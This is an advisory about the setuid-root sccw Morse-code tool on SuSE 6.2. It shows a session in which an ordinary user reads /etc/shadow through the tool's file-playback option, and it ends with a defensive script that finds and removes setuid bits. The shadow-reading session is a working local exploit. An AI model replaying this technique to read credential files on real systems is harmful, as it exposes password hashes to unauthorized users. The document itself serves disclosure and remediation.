COMMAND

    /usr/bin/sccw

SYSTEMS AFFECTED

    SuSE 6.2

PROBLEM

    Brock Tellier found the following.  /usr/bin/sccw, suid root by
    default on SuSE 6.2, allows any user to read any file on the
    system.  Sort of.  Well, it's enough to read the text of almost
    anything.  In capitals.  Without punctuation.  Check it out:

        xnec@susebox:/tmp > id
        uid=1001(xnec) gid=100(users) groups=100(users)
        xnec@susebox:/tmp > sccw
        ==========================================================
        Soundcard CW for Linux  v1.1  Steven J. Merrifield, VK3ESM
        ==========================================================
        1. Set the speed, currently = 10
        2. Set the frequency, currently = 700
        3. Set the volume, currently = 32
        4. Set the delay value, currently = 3
        5. Set the character set for random groups, currently = 1
        6. Set the number of groups, currently = 5
        7. Receive random character groups.
        8. Receive a file.
        9. QUIT
        ==========================================================
        Enter your choice : 8
        Enter filename : /etc/shadow
        ROOTFGPZNZWZ5GWRG10850010000
        BIN8902010000
        DAEMON8902010000
        ... etc.

    The printing of these lines takes a few seconds each, so be
    patient.  While you're waiting, remove the suid-bit.  Of course,
    getting the /etc/shadow file in all caps isn't instant root, but
    it's a start for someone out there.  Besides, he can still read
    your mail in all caps, without punctuation.

SOLUTION

    Well, no instant root, but at least fewer combinations to try.
    Remove the suid bit.
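
    One way to apply and verify the fix above, as an added example
    that is not part of the original advisory.  Only the path
    /usr/bin/sccw comes from the advisory; the function names
    list_suid and strip_suid are illustrative.

```shell
#!/bin/sh
# Added example: audit for setuid files and remove the bit, as the
# SOLUTION advises. Function names are illustrative, not from the advisory.

# list_suid DIR: print every regular file under DIR that has the
# setuid bit set, without crossing into other filesystems.
list_suid() {
    find "$1" -xdev -type f -perm -4000 -print 2>/dev/null
}

# strip_suid FILE: clear the setuid bit on FILE and verify the result.
# Returns 0 if the bit is clear afterwards (or was never set),
#         1 if FILE does not exist,
#         2 if the bit could not be removed.
strip_suid() {
    f=$1
    [ -e "$f" ] || { echo "skip: $f not found" >&2; return 1; }
    if [ ! -u "$f" ]; then
        echo "ok: $f is not setuid"
        return 0
    fi
    ls -ld "$f"                   # record owner and mode before the change
    chmod u-s "$f" || return 2
    [ ! -u "$f" ] || return 2     # re-check instead of trusting chmod
    echo "fixed: setuid bit removed from $f"
    ls -ld "$f"
}

# With a path argument, fix that file, e.g. as root on an affected host:
#     sh fix-suid.sh /usr/bin/sccw
# Without arguments the script only defines the functions, so it can be
# sourced and list_suid /usr/bin run first to review what else is setuid.
[ $# -eq 0 ] || strip_suid "$1"
```

    After the change sccw opens files with the invoking user's own
    permissions, so choice 8 can no longer read /etc/shadow.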